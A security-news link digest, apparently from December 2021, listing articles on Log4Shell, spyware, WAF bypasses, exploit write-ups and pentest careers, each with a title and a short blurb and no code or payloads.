Analysis of Initial In The Wild Attacks Exploiting Log4Shell/Log4J/CVE-2021-44228 https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/
Cado
Analysis of Initial In The Wild Attacks Exploiting Log4Shell/Log4J/CVE-2021-44228
Log4J is an open-source logging platform running on Java and built-in to many web platforms. Reports of exploitation started on December 9th.
CVE-2021-44228 vulnerability in Apache Log4j library https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210
Securelist
CVE-2021-44228 vulnerability in Apache Log4j library
The summary of the critical vulnerability CVE-2021-44228 in the Apache Log4j library, technical details and mitigations.
Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/
Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/
Sysdig
Exploiting, Mitigating, and Detecting CVE-2021-44228: Log4j Remote Code Execution (RCE) | Sysdig
The CVE-2021-44228 is a CRITICAL vulnerability that allows attackers to execute arbitrary code on a machine. Updating log4j to 2.16.0.
Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
Microsoft News
Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability
Microsoft is tracking threats taking advantage of the remote code execution (RCE) vulnerability in Apache Log4j 2. Get technical info and guidance for using Microsoft security solutions to protect against attacks.
Windows Privilege Escalation: Scheduled Task/Job (T1573.005) https://www.hackingarticles.in/windows-privilege-escalation-scheduled-task-job-t1573-005/
Hacking Articles
Windows Privilege Escalation: Scheduled Task/Job (T1573.005)
Learn how to exploit Windows Scheduled Task/Job (T1573.005) for privilege escalation using misconfigured task scheduler settings.
Risk analysis of Log4Shell (CVE-2021-44228) and mitigation https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.html
How I was able to bypass Cloudflare WAF for SQLi payload https://infosecwriteups.com/how-i-was-able-to-bypass-cloudflare-waf-for-sqli-payload-b9e7a4260026
Medium
How i was able to bypass Cloudflare WAF for SQLi payload
Bypassing Cloudflare for achieving SQL Injection
A strategy to land your first pentest job https://blog.pentesterlab.com/a-strategy-to-land-your-first-pentest-job-25209a351689
Pentesterlab
A strategy to land your first pentest job - PentesterLab's Blog
Learn the strategy to get a job in pentesting or web security. Understand different levels of knowledge, from basic to expert, in hacking, code review, and application security. Get insights on how focusing on one category can help you master pentesting and…
Remote Deserialization Bug in Microsoft's RDP Client through Smart Card Extension (CVE-2021-38666) https://thalium.github.io/blog/posts/deserialization-bug-through-rdp-smart-card-extension/
Worth reading » A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
projectzero.google
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution - Project Zero
Posted by Ian Beer & Samuel Groß of Google Project Zero We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and...
This shouldn't have happened: A vulnerability postmortem https://googleprojectzero.blogspot.com/2021/12/this-shouldnt-have-happened.html
Blogspot
This shouldn't have happened: A vulnerability postmortem
Posted by Tavis Ormandy, Project Zero Introduction This is an unusual blog post. I normally write posts to highlight some hidden att...
Reverse Engineering Crypto Functions: AES https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions-aes
GoggleHeadedHacker
Reverse Engineering Crypto Functions: AES
This tutorial will show how two methods of implementing the AES algorithm work. It will also demonstrate how to identify these methods in Assembly when reverse engineering an application.
Researcher publishes PoC for Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2021-42287, CVE-2021-42278) https://securityonline.info/researcher-publishes-poc-for-active-directory-domain-services-elevation-of-privilege-vulnerability-cve-2021-42287-cve-2021-42278/
Cybersecurity News
Researcher publishes PoC for Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2021-42287, CVE-2021-42278)
the details of the vulnerability and the POC of the Microsoft Windows Active Directory domain service privilege escalation vulnerability have been disclosed
Pegasus vs. Predator Dissident’s Doubly-Infected iPhone Reveals Cytrox Mercenary Spyware https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/
The Citizen Lab
Pegasus vs. Predator
Two Egyptians—exiled politician Ayman Nour and the host of a popular news program (who wishes to remain anonymous)—were hacked with Predator spyware, built and sold by the previously little-known mercenary spyware developer Cytrox. The phone of Ayman Nour…
Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html
Cisco Talos Blog
Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension
By Tiago Pereira.
* Talos recently observed a malicious campaign offering fake installers of popular software as bait to get users to execute malware on their systems.
* This campaign includes a set of malware distribution campaigns that started in late…
* Talos recently observed a malicious campaign offering fake installers of popular software as bait to get users to execute malware on their systems.
* This campaign includes a set of malware distribution campaigns that started in late…
Log4j Vulnerability: Attackers Shift Focus From LDAP to RMI https://blogs.juniper.net/en-us/threat-research/log4j-vulnerability-attackers-shift-focus-from-ldap-to-rmi
Juniper Networks
Log4j Vulnerability: Attackers Shift Focus From LDAP to RMI
Juniper Threat Labs has observed variants of the ongoing Log4j CVE-2021-44228 attacks that use an RMI service instead of LDAP.
If You’re Not Doing Continuous Asset Management You’re Not Doing Security https://danielmiessler.com/blog/continuous-asset-management-security/
Danielmiessler
If You’re Not Doing Continuous Asset Management You’re Not Doing Security
April 25, 2018 The more a company can tell me about their assets the better their security is, and the more comprehensive and real-time the inventory is, the mo
A Detailed Guide on Log4J Penetration Testing https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/
Hacking Articles
A Detailed Guide on Log4J Penetration Testing
In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the